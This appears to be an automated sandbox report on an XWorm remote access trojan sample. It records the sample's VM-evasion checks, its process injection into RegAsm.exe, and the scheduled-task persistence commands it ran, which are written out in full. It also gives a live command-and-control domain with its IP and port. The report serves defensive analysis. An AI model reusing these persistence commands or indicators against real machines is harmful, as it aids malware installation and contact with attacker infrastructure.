              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\fresh_shrunk.exeMemory allocated: 2710000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeMemory allocated: 4860000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1180000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2DF0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1180000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeMemory allocated: 14B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeMemory allocated: 2FB0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2E10000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 3040000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9796Jump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exe TID: 6900Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5480Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7164Thread sleep count: 49 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7164Thread sleep count: 9796 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe TID: 6208Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7092Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Users\user\Desktop\fresh_shrunk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: fresh_shrunk.exe, 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp, bddddsx.exe, 00000009.00000002.1695358036.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMU Virtual CPU
              Source: RegAsm.exe, 00000001.00000002.4135013411.0000000000FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\fresh_shrunk.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\fresh_shrunk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\fresh_shrunk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000Jump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000Jump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A79008Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F57008Jump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx"Jump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /fJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C copy "C:\Users\user\Desktop\fresh_shrunk.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /fJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /fJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C copy "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
              Source: C:\Users\user\Desktop\fresh_shrunk.exeQueries volume information: C:\Users\user\Desktop\fresh_shrunk.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: RegAsm.exe, 00000001.00000002.4139366985.00000000063D0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4135013411.0000000000FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.fresh_shrunk.exe.287683c.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.bddddsx.exe.2fd0628.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.fresh_shrunk.exe.288057c.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.bddddsx.exe.2fc68e8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.1720132463.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1695358036.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4136838151.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: fresh_shrunk.exe PID: 6860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: bddddsx.exe PID: 3192, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6616, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.fresh_shrunk.exe.287683c.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.bddddsx.exe.2fd0628.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.fresh_shrunk.exe.288057c.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.bddddsx.exe.2fc68e8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.1720132463.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1695358036.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4136838151.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: fresh_shrunk.exe PID: 6860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: bddddsx.exe PID: 3192, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6616, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Valid Accounts              		131
              Windows Management Instrumentation              		1
              Valid Accounts              		1
              Valid Accounts              		1
              Masquerading              		1
              Input Capture              		231
              Security Software Discovery              		Remote Services1
              Input Capture              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		1
              Access Token Manipulation              		1
              Valid Accounts              		LSASS Memory1
              Process Discovery              		Remote Desktop Protocol11
              Archive Collected Data              		1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              DLL Side-Loading              		311
              Process Injection              		1
              Access Token Manipulation              		Security Account Manager141
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Scheduled Task/Job              		1
              Disable or Modify Tools              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture21
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
              DLL Side-Loading              		141
              Virtualization/Sandbox Evasion              		LSA Secrets24
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
              Process Injection              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Deobfuscate/Decode Files or Information              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
              Obfuscated Files or Information              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt22
              Software Packing              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              DLL Side-Loading              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1429324 Sample: fresh_shrunk.exe Startdate: 21/04/2024 Architecture: WINDOWS Score: 100 50 vbdsg.duckdns.org 2->50 54 Snort IDS alert for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 62 9 other signatures 2->62 8 fresh_shrunk.exe 1 2->8         started        11 bddddsx.exe 1 2->11         started        signatures3 60 Uses dynamic DNS services 50->60 process4 signatures5 64 Writes to foreign memory regions 8->64 66 Allocates memory in foreign processes 8->66 68 Injects a PE file into a foreign processes 8->68 13 RegAsm.exe 2 8->13         started        17 cmd.exe 2 8->17         started        19 cmd.exe 3 8->19         started        22 cmd.exe 1 8->22         started        70 Multi AV Scanner detection for dropped file 11->70 72 Machine Learning detection for dropped file 11->72 24 cmd.exe 11->24         started        26 cmd.exe 1 11->26         started        28 cmd.exe 11->28         started        30 RegAsm.exe 1 11->30         started        process6 dnsIp7 52 vbdsg.duckdns.org 57.128.155.22, 49730, 8896 ATGS-MMD-ASUS Belgium 13->52 74 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 13->74 76 Uses schtasks.exe or at.exe to add and modify task schedules 17->76 32 conhost.exe 17->32         started        48 C:\Users\user\AppData\Local\...\bddddsx.exe, PE32 19->48 dropped 34 conhost.exe 19->34         started        36 conhost.exe 22->36         started        38 schtasks.exe 1 22->38         started        40 conhost.exe 24->40         started        42 schtasks.exe 1 24->42         started        44 conhost.exe 26->44         started        46 conhost.exe 28->46         started        file8 signatures9 process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              fresh_shrunk.exe55%ReversingLabsByteCode-MSIL.Trojan.Seraph
              fresh_shrunk.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe55%ReversingLabsByteCode-MSIL.Trojan.Seraph

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              vbdsg.duckdns.org
              		57.128.155.22
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
